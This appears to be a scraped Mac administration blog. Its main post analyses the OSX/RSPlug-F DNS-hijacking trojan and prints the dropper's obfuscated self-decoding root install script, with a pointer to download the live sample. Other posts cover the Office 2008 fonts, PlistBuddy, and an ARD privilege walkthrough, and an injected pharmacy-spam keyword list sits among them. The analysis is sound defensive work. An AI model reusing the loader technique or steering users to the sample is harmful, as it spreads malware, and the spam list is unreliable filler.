Tearing Apart OSX/RSPlug-F

OK… I might be a bit late to the party (and Conficker is grabbing all the headlines) but there were some interesting things I found looking at the  headline grabbing trojan OSX/RSPlug-F. Thanks to the effervescent Graham Cluley for his witty post with video demonstration of OSX/RSPlug-F being detected. It’s what started this investigation.

So, being the curious guy I am I decided to download the very same file Graham did in his demo. While, hdtvxvid.org had since fixed their hijacked page, luckily the status bar had a readable URL that with some squinting I was able to decipher it… So I downloaded the sucker, you can too!

Live Code: OSX/RSPlug-F trojan

And what else can I say but: I’ll be darned if I can get the thing to work! Actually I do get it to work, but due to some coding errors out of the box, it’s a dud.

So let’s start the dissection:

The URL downloads HDTVPlayerv3.5.dmg, inside is contained install.pkg, which if you’re using Safari on a Mac and have the damnable default of “Open ‘Safe’ files after Downloading” it’ll go right to the installer. Which let me note Open “Safe” Files after downloading is the stupidest thing to happen to browsers since Active-X. The air quotes around “Safe” do not help, Apple, it’s a sly wink and a nod that no file type is totally safe but *shrug* whatcha gonna do? I’ll tell you what: don’t make it a dang default!

firefox-rsplug-cached-before-clicking-save

Firefox is not off the hook either, let me bring up the poisonous Firefox convenience: “predownloading”. Did everyone notice how the virus alert for Graham pops up before he clicks save? How Firefox initiates downloads immediately to cache and upon the user clicking Save it copies it to the destination or if the click Cancel it stays there. I think Firefox’s behaviour is ridiculous, yes it might make me happy when I download some ginormous game demo and come back hours later having forgotten to click Save and am pleasantly surprised that “hey it’s already here!”, but otherwise let me decide what and when something goes on my hard drive.

Anyway… let’s look at an Installer window the average user won’t look at: Show Files

./AdobeFlash
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/version.plist

First couple of suspect thing is a single flat file called AdobeFlash and then Mozillaplug.plugin, which is really just the mysterious VerifiedDownloadPlugin. No mention of Cinema eh?

Take a gander in Info.plist of install.pkg to see where it goes:
IFPkgFlagDefaultLocation /Library/Internet Plug-Ins/

So then, why would it need root privileges for an admin writable folder, eh?
redflag
IFPkgFlagAuthorizationAction RootAuthorization, for those following along in the Info.plist
Bonus: CFBundleGetInfoStringwho cares
Double Secret Bonus:
Resource/en.lproj/Description.plist IFPkgDescriptionDescription = shutdafuckup

Strangely when you look in both the logs created by Installer.app in /var/log/installer.log:
Leopard it says: "admin auth received to install"
Tiger says: "Administrator authorization granted."
I don’t know why you wouldn’t want the logs to clearly state root privileges were given, but there you have it, it doesn’t.

So what does it do with the root privileges? Hmmm? Let’s look in the preinstall/preupgrade scripts which are identical because apparently the author didn’t realize that a preflight script would kill two birds with one stone.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -37 $0 | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
yksrepsak 777 nigeb
O(2/H178PI@(C%6;EQ&<#-RX"-Y(2/21$1!!52M
.... <SNIP> ....
*4F;DI`8*(B(`A$8*TD(`5T4^<3+4EC-8
`
dne

OK, so it takes the tail of itself , does some sed magic to flip around the reveresed UUEncoded data, spit it out, replace ‘applemac’ with ‘AdobeFlash’ (remember that’s in the bom payload), replace bsd with 7000, gnu with a boolean value that depends on whether there are any arguments when the script is called. Then after all that sed nonsense, names the file the result of uname -p, attempts to execute the file (as root), delete that file, then exit.

Well, we’ll get to the ‘unencrypted’ payload in a sec let’s run this and see what happens leopard-fail anf tiger-fail — they fail. As a consequence, the AdobeFlash is NOT installed, but it is the same code as the preinstall so, still not off the hook here.Let’s see where we’re at:

The root crontab is altered to inlude: * */5 * * * /Library/Internet Plug-Ins/AdobeFlash
Since the script fails, the package does not install, so the crontab pointing to it is useless…

i386 is left in the root, it doesn’t get a chance to delete itself, considering that all those && statements mean “execute the next step only if the last thing completed correctly”, since it fails it doesn’t get deleted.

i386 contains some more backward UUEncoded data with and some more sed replacements, then pipes it all into perl, here’s the perl code it attempts to run, but unfortunately it fails on line 14 and goes no further. But let’s say we fix the code so it can talk to the server, get a response, and parse the output into a file…

685 is downloaded to /tmp where it runs, does some more sed string swaps, secret decoder ring translations for the DNS servers, outputs this — the nasty part that changes your DNS entries, then deletes the temp file. It makes good use of the very handy concept of “here documents” to script scutil to change the DNS servers, which seem to rotate, you’ll get new servers everytime you run it, suffice to say, the Ukranian subnet of 85.255.112.xxx is totally compromised, as well as 94.247.2.109 the Latvian server from which the files are downloaded. But who knows who’s financing and running it in this global day and age. But the propensity for matryoshka style nested code seems telling :)

Running some dig commands to get DNS answers from the servers reveals they are given back valid addresses, currently, but I only tested a few sites, it might only have redirection for select dummy bank sites they have set up, who knows…

The lesson here is: Always use Installer to look at the Files, see what your authorization level is, check out the pre/post scripts and generally do what only 1% of the most vigilant of the population would do and you’ll be fine. Hopefully, root authorization will carry more weight in the Installer.app UI and say “Hey are your sure you want to grant root — REALLY!?”, pre/postflight scripts will be easier to look in UI (I am dreaming aren’t I), the logs won’t lie about the auth level (very do-able), and Firefox will respect my wishes and only truly Save when I click Save… (it’s open source, easy to change, but it’ll take a flame war to settle it)

Until then, I hope you enjoyed this malware tour, stay safe and away from porn sites with 3rd party HD codecs.

Update:
I suppose it’d be helpful to add some instructions on how to reverse the scutil modifications, here’s the script (the code might look familiar)

#!/bin/sh
if (( $(id -u) != 0 )); then echo "Please run with sudo" && exit 1; fi
PSID=$( (/usr/sbin/scutil | /usr/bin/grep PrimaryService | /usr/bin/sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
d.show
quit
EOF
)

/usr/sbin/scutil << EOF
remove State:/Network/Service/$PSID/DNS
quit
EOF

echo "Please toggle your network adapter on/off to refresh DNS servers from DHCP"

Basically it nukes the DNS entries that got hosed, then pulls down the DHCP info, uless you have manually entered DNS settings, in which case, you should know what you’re doing.

New PlistBuddy Behaviour

So, the new UniBody MacBooks come with a build 9G2133 of 10.5.6, currently build 9G55 of 10.5.6 is what’s out there. What’s more /usr/libexec/PlistBuddy has been updated as well

9G2133 (new):
-rwxr-xr-x 1 root wheel 84400 Sep 24 17:21 PlistBuddy

9G55 (old):
-rwxr-xr-x 1 root wheel 73792 Apr 7 2008 PlistBuddy

What’s changed with PlistBuddy is this:
* Now, exits with non-zero status on failure (like the man page says)
* Writes errors to stderr instead of stdout

What this might mean to you is if you have a script that tests the stdout of PlistBuddy to detect errors, instead of the exit code (which hasn’t worked until now) then that script might just keep going and going and going…

For example: I use  PlistBuddy to add icons to the Dock in custom pkgs I make for work. So the other day when I ran the base packages, Adobe Acrobat being one of them, it just kept going, never fininshing, looking in install.log I found my script stuck in a loop, counting ever higher…

Mar 23 12:42:45 BlankMacBookUni runner[641]: postflight[648]: Print: Entry, "persistent-apps:546217:tile-data:file-label", Does Not Exist

In about 30 mins it had gotten up to 546,217 attempts to read the Dock plist (thas’ a big log file!). Since my script was testing the stdout string which was now blank because it was going to stderr, it didn’t know it reached the end!

To illustrate how I changed the code to compensate for either version, here’s the snippet that will detect if it is at the end of the plist, based on the output (or lack thereof):

Old code:
if [[ "$output" == *Does\ Not\ Exist ]]; then

New Code:
if [[ "$output" == *Does\ Not\ Exist ]] || [ -z "$output" ]; then

So, we’ll see if this is rolled into 10.5.7, probably. For Tiger, I use the PlistBuddy found in /Library/Receipts/iTunesX.pkg/Contents/Resources/, as of iTunes 8.1 it is still the older version.

Hope this of use to someone. Thanks for reading.

A new start…

OK, I’ve upgraded my WordPress install, as well as trying the WP_Spamfree plugin.

You know I had 3,500 Spam trackbacks awaiting moderation? That my WP install had been hacked AGAIN, and my cryptograph plugin disabled? Sheesh. I really would like to allow comments and trackback, but the spam is horrendous (literally, quite the vilest stuff you can imagine), Anyway, here’s hoping it works. Going to give it a day or two and see how it goes.

I’ve got some good stuff planned to share. #1 being how to make standard pkg files for Acrobat Reader and CS3 and CS4… w00t.

10.4.11 DNS results from doxpara.com

The results are in for my iBook G4 running 10.4.11 with Security patch 2008-005 when using the DNS checker at doxpara

Your name server, at 206.141.xxx.50, appears to be safe, but make sure the ports listed below aren’t following an obvious pattern (:1001, :1002, :1003, or :30000, :30020, :30100…).

Requests seen for cf2cfda1b5c1.doxdns5.com:

206.141.xxx.50:3831 TXID=31583

206.141.xxx.40:6670 TXID=27344

206.141.xxx.35:49337 TXID=35665

206.141.xxx.38:10792 TXID=50022

206.141.xxx.36:11111 TXID=63897

 

There’s some who say things aren’t all right, but the patch from Apple seems to be satisfying the the tool of the researcher who found the bug, and ncircle doesn’t provide the command line or tool that they used to obtain these results. So for me I feel confident in this patch as-is, especially since BIND isn’t turned on anyway and I’m not using my DNS anyway (and the vast majority of Mac owners aren’t either) I’m using my DSL provider AT&T’s DNS server for resolution, so it’s them who I hope have patched all their routers. And I’m sure they did, Tuesday before last

x86 Inertia

So I was reading this interview with Stephen Morse the designer of the 8086 which is 30 years old this year. A couple points it makes are: being in the right place at the right time is sometimes all it takes to be part of something big and the inertia of what already exists greatly affects future designs.Here’s a couple quotes from Stephen I liked:

I always regret that I didn’t fix up some idiosyncrasies of the 8080 when I had a chance. For example, the 8080 stores the low-order byte of a 16-bit value before the high-order byte. The reason for that goes back to the 8008, which did it that way to mimic the behavior of a bit-serial processor designed by Datapoint;(a bit-serial processor needs to see the least significant bits first so that it can correctly handle carries when doing additions). Now there was no reason for me to continue this idiocy, except for some obsessive desire to maintain strict 8080 compatibility. But if I had made the break with the past and stored the bytes more logically, nobody would have objected. And today we wouldn’t be dealing with issues involving big-endian and little-endian–the concepts just wouldn’t exist.

Basically once you start a bad habit it’s hard to break, which leads on to this:

I’m a PC guy. I long resisted the Mac because there were still programs that were written for the PC and would not run on the Mac. I felt it was like the Betamax/VHS story: Betamax was a better technology, but anyone buying a Betamax recorder would have a small selection of tapes available to rent and would be limited in who they could share tapes with. Now that you can get a Mac that executes x86 code, the situation has changed somewhat, but I’ve resisted a Mac for so long that it’s hard to switch gears at this point.

I just find it humorous that these de facto standards in the industry are sometimes just the product of how someone started doing it one way and everyone followed suit, and even if there was a better or different way to do things, it’s not how everyone else is doing it, and that’s inertia… or entropy? Seems like you need a shake every so often to keep things fresh yes?

What’s in the Time Machine Update?

Here’s the meat of what gets updated: backup daemon helper & file vault image tool, loginwindow.app, Broadcom and Aetheros wireless kexts. Lotsa System.kexts: BSD, IOKit, Libkern, MAC Framework, Mach. The AFP filesystem plugin, metadata framework, the backupd launch daemon plists, and the DiskImages framework.

 

/System/Library/CoreServices/SystemVersion.plist

/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper

/System/Library/CoreServices/backupd.bundle/Contents/Resources/fvimagetool

/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros.kext/Contents/MacOS/AirPortAtheros

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AppleAirPortBrcm4311.kext/Contents/MacOS/AppleAirPortBrcm4311

/System/Library/Extensions

/System.kext/PlugIns/BSDKernel.kext/BSDKernel

/System/Library/Extensions

/System.kext/PlugIns/IOKit.kext/IOKit

/System/Library/Extensions

/System.kext/PlugIns/Libkern.kext/Libkern

/System/Library/Extensions

/System.kext/PlugIns/MACFramework.kext/MACFramework

/System/Library/Extensions

/System.kext/PlugIns/Mach.kext/Mach

/System/Library/Extensions

/System.kext/PlugIns

/System6.0.kext/kernel.6.0

/System/Library/Extensions

/System.kext/PlugIns/Unsupported.kext/Unsupported

/System/Library/Filesystems/AppleShare/afpfs.kext/Contents/MacOS/afpfs

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Support/mds

/System/Library/LaunchDaemons/com.apple.backupd-attach.plist

/System/Library/LaunchDaemons/com.apple.backupd-auto.plist

/System/Library/LaunchDaemons/com.apple.backupd-wake.plist

/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages/usr/share/man/man1/tmdiagnose.1

Here’s hoping that the update in tandem with the Airport/Time Capsule fixes some of the problems people have had with using a hard drive as an Airport disk on the Airport Extremes. For me it wasn’t even about Time Machine, the real pain was transfers were SLOW even over the 100Mb/s Ethernet (dangit I jumped the gun and didn’t get the GigE model) and sometimes the Airport Disk couldn’t be mounted on my computers until the Airport was restarted. Also with the update the ever mysterious Wide Area Bonjour prefs are still around, they are in the Name-Edit… button now.One more thing…/usr/share/man/man1/tmdiagnose.1: Hmmm, is this a Time Machine diagnostics tool?Let’s have a look at the man page or this one:tmdiagnose(1) BSD General Commands Manual tmdiagnose(1)NAME tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsedfor whatis database.

tmdiagnose(1)             BSD General Commands Manual            tmdiagnose(1) 

NAME

     tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsed

     for whatis database.

SYNOPSIS

     tmdiagnose, [-abcd] [-a path] [file] [file …] arg0 arg2 …

DESCRIPTION

     Use the .Nm macro to refer to your program throughout the man page like such: tmdiagnose, Underlining

     is accomplished with the .Ar macro like this: underlined text.

     A list of items with descriptions:

     item a   Description of item a

     item b   Description of item b

     A list of flags and their descriptions:

     -a       Description of -a flag

     -b       Description of -b flag

FILES

     /usr/share/file_name                          FILE_1 description

     /Users/joeuser/Library/really_long_file_name  FILE_2 description

SEE ALSO

     a(1), b(1), c(1), a(2), b(2), a(3), b(3)

Darwin                           April 2, 2008                          Darwin

 

 Only a dummy man page. And no executable to be found. Its origins though are from the BSD package (see /Library/Receipts/boms/com.apple.pkg.BSD.bom) No change has been made to this man page since 10.5 but yet it is included with this update? Odd. My guess is that there is an Apple internal tool in use but not something for the general public. I mean why would the ‘Rest of Us’ need to diagnose Time Machine?!It’ just works right? ;)

Office 2008 fonts

A postscript to fonts (hehe), I wanted to mention how Office 2008 will replace your Apple supplied fonts with Microsoft fonts, placing them in /Library/Fonts Disabled. Well I like my Apple fonts just fine thank you, so for posterity here’s a list of the fonts that get bumped:

Tiger and Leopard Conflicts:

Andale Mono
Arial
Arial Black
Arial Narrow
Arial Rounded Bold
Brush Script
Comic Sans MS
Georgia
Impact
Times New Roman
Trebuchet MS
Verdana

Leopard Only Conflicts:

Tahoma
Wingdings 2
Wingdings 3

Also, just so you know there is set of fonts that Microsoft calls it’s ClearType Font Collection these fonts can be found on Vista and Windows Office 2007 (and Office 2008) they are:

Calibri Bold Italic.ttf
Calibri Bold.ttf
Calibri Italic.ttf
Calibri.ttf
Cambria Bold Italic.ttf
Cambria Bold.ttf
Cambria Italic.ttf
Cambria.ttf
Candara Bold Italic.ttf
Candara Bold.ttf
Candara Italic.ttf
Candara.ttf
Consolas Bold Italic.ttf
Consolas Bold.ttf
Consolas Italic.ttf
Consolas.ttf
Constantia Bold Italic.ttf
Constantia Bold.ttf
Constantia Italic.ttf
Constantia.ttf
Corbel Bold Italic.ttf
Corbel Bold.ttf
Corbel Italic.ttf
Corbel.ttf

All named C, like when parents name all there kids by the same letter, which is a bizarre practice I’ve never understood. I have yet to do more testing, but in an attempt to find out what the bare minimum fonts required are this seems like a good place to start.

And what the hey, here’s the rest of the Office 2008 fonts minus the conflicts and the ClearType Collection:

Abadi MT Condensed Extra Bold
Abadi MT Condensed Light
Baskerville Old Face
Batang.ttf
Bauhaus 93
Bell MT
Bernard MT Condensed
Book Antiqua
Bookman Old Style
Bookshelf Symbol 7.ttf
Braggadocio
Britannic Bold
Calisto MT
Century
Century Gothic
Century Schoolbook
Colonna
Cooper Black
Copperplate Gothic Bold
Copperplate Gothic Light
Curlz MT
Desdemona
Edwardian Script ITC
Engravers MT
Eurostile
Footlight Light
Franklin Gothic Book Italic.ttf
Franklin Gothic Book.ttf
Franklin Gothic Medium Italic.ttf
Franklin Gothic Medium.ttf
Garamond
Gill Sans MT Bold Italic.ttf
Gill Sans MT Bold.ttf
Gill Sans MT Italic.ttf
Gill Sans MT.ttf
Gill Sans Ultra Bold
Gloucester MT Extra Condensed
Goudy Old Style
Gulim.ttf
Haettenschweiler
Harrington
Imprint MT Shadow
Kino
Lucida Blackletter
Lucida Bright
Lucida Calligraphy
Lucida Console.ttf
Lucida Fax
Lucida Handwriting
Lucida Sans
Lucida Sans Typewriter
Lucida Sans Unicode.ttf
Marlett.ttf
Matura Script Capitals
Meiryo Bold Italic.ttf
Meiryo Bold.ttf
Meiryo Italic.ttf
Meiryo.ttf
Mistral
Modern No. 20
Monotype Corsiva
Monotype Sorts
MS Gothic.ttf
MS Mincho.ttf
MS PGothic.ttf
MS PMincho.ttf
MS Reference Sans Serif.ttf
MS Reference Specialty.ttf
MT Extra
News Gothic MT
Onyx
Perpetua Bold Italic.ttf
Perpetua Bold.ttf
Perpetua Italic.ttf
Perpetua Titling MT
Perpetua.ttf
Playbill
PMingLiU.ttf
Rockwell
Rockwell Extra Bold
SimSun.ttf
Stencil
Tw Cen MT Bold Italic.ttf
Tw Cen MT Bold.ttf
Tw Cen MT Italic.ttf
Tw Cen MT.ttf
Wide Latin
Wingdings

order abilify online
acai
accutane withdrawal
aciphex online pharmacy
acomplia
buy actonel without prescription
price of actos
order aleve online
buy allegra online
order alli
altace with no prescription
purchase antibiotics
aricept
arimidex canada
ashwagandha canada
astelin cost
atacand online
atarax rx
generic augmentin
avandia mg
price of avapro
purchase avodart
bactrim tablets
order benadryl online
cheapest benicar
biaxin online pharmacy
no prescription buspar
cardizem online
celebrex overnight
celadrin
cephalexin drugs
cialis canada
cipro cost
cla discounted
cheap clarinex
claritin online
buying clomid
clonidine overnight
colchicine information
coreg with no prescription
online coumadin
cozaar vs
creatine
buy crestor without a prescription
cymbalta mg
cytotec no prescription
order depakote
price of diclofenac
differin medication
diflucan mg
diovan overnight no rx
doxycycline delivery
effexor
flagyl
flomax product
buy glucophage without prescription
hair loss
hangover
cheapest hoodia
keppra
lamictal no prescription
lamisil canada
prices lasix
levaquin vs
no prescription levitra
buy lexapro without a prescription
cost of lipitor
prices lisinopril
melatonin tablets
metformin
methotrexate
micardis tablets
order mobic online
motrin coupon
msm
neurontin withdrawl
nexium order online shipping
purchase nizoral online
nolvadex tablets
omnicef no prescription
cost of paxil
penis extender product
phentermine
phosphatidylserine
plan b online
cost of plavix
pravachol vs
prednisone medication
order premarin
purchase prevacid online
prometrium delivery
propecia delivery
provera withdrawal
order prozac online
generic reglan
reminyl
rimonabant no rx
buy risperdal without prescription
cheap rogaine no prescription
seroquel pills
singulair cost
cheap skelaxin
generic stop smoking
strattera tablets
discount stress relief
synthroid coupon
tetracycline
buy topamax online
toprol
price of toradol
tramadol pills
trazodone
tricor order online shipping
trileptal vs
ultracet no prescription
valtrex online pharmacy
cheapest viagra
voltaren tablet
price of vytorin
weight loss drugs
wellbutrin
yohimbe
zantac canada
buy zetia online
zestoretic medication
buy zithromax without prescription
no prescription zoloft
order zovirax online
cheap zyban
zyprexa overnight no rx
purchase zyrtec online
cheap zyvox no prescription

Office 2008 12.01 Update almost does it

So the Office 2008 12.01 updater came out, it’s got a whole lot of packages for each app and component with postflight scripts written in Python to clean up all the permissions:

Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: setting ownership/permissions
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: fixing setuid flags
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: clearing ACLs
Mar 12 15:33:00 brunerd runner[8556]: postflight[8773]: sanitizing receipts

Doing an ls -lRFG in /Applications/Microsoft Office 2008 won’t leave you seeing red, they’ve cleaned that all up quite nicely.

Anyway, call me picky, but it forgets just one thing, the /Library/Fonts/Microsoft folder, it leaves that and its contents owned by 502 and they’re all marked executable. (Fonts don’t really need to be executable.) And as paranoid as it is — it’s still not quite right. So after you’ve put your tinfoil hat on, run 12.01, you can do this to finish it up:

#take away all users’ execute permissions
chmod a-x /Library/Fonts/Microsoft/*
#recursively own all fonts as root and admin group
sudo chown -R root:admin /Library/Fonts/Microsoft

Update: Or you can go into the update using Show Package Contents then navigate to Contents/Packages and run Office2008_en_fonts_12.0.1.incremental.pkg again, that’ll do the trick.

Applescript Language Guide for Leopard Released (Finally)

So just today I was this close to going on the Applescript mailing list to find out why the Apple Script Language guide for Leopard had yet to be released, despite being touted as “the essential guide for scripters and developers” on the Apple website, the old version from 1999 was all that could be found since Leopard’s release last year.

But today, with as little fanfare as possible, it was released.

Now go forth and…

tell Safari
get all documents containing “Applescript 2.0”
end tell

ARD Security Awareness (Standard User can run root commands)

Did you know a Standard user can run commands as root via ARD?
This seems really odd doesn’t it? Why would this be necessary? The thing that gets me is how in Tiger you had to explicitly grant each user the privileges after starting the ARD service. But in Leopard, when you start the service All Users is the default.

So let’s take a walkthrough of what I was looking into this Friday evening:
Find a Mac running Leopard
Turn on Remote Management (yes you do have to be admin to do this)
Notice the default is for All Users to have access.
Create a Standard user in Leopard
Great, now go get a machine with ARD on it.
Add the computer to your ARD list using the standard user’s credentials
Send it a Unix Command to run as root (touch /HaxorWasHere, in this case)
Notice the new file owned by root in a place where no standard user can put things.

Interestingly, perhaps because I had done this a number of times, and Leopard got confused after a while, I tried deleting through Finder (while logged in as ‘test’ but authenticating as administrator) and got this message

OK that oddity aside, here’s another: You don’t need to have everything checked in ARD’s preferences to accomplish this, here’s the bare minimum :

  • Generate reports
  • Open and quit applications
  • Change settings
  • Delete and replace items
  • Restart and shut down
  • Copy items
  • Page 66 of the ARD manual does go into detail what needs to be turned on to run a Unix command, but why not just have a check box: Run Unix Command? Also, Generate Reports isn’t listed as one of them, but unless it was checked I got this?

    Now I’m not saying this is an out and out security breach, no, because it requires admin privileges to turn on the service and add the user, but it does show how simply checking a check box as an admin could open your up your Mac to Bad Things™ if a standard user on your family computer has a weak password and someone else has ARD in a dark alley… well, you know what I mean. This just doesn’t seem right. Standard users should only be able to do standard user things, even in the magical world of ARD.

    See the ARD manual pages 65-68 for Apple’s wording on the Remote Management Preference pane permissions. See if it seems clear that Standard users given ‘administrator’ (ARD administrator in this case) privileges can run as root. Leave a comment and let me know what you think, thanks.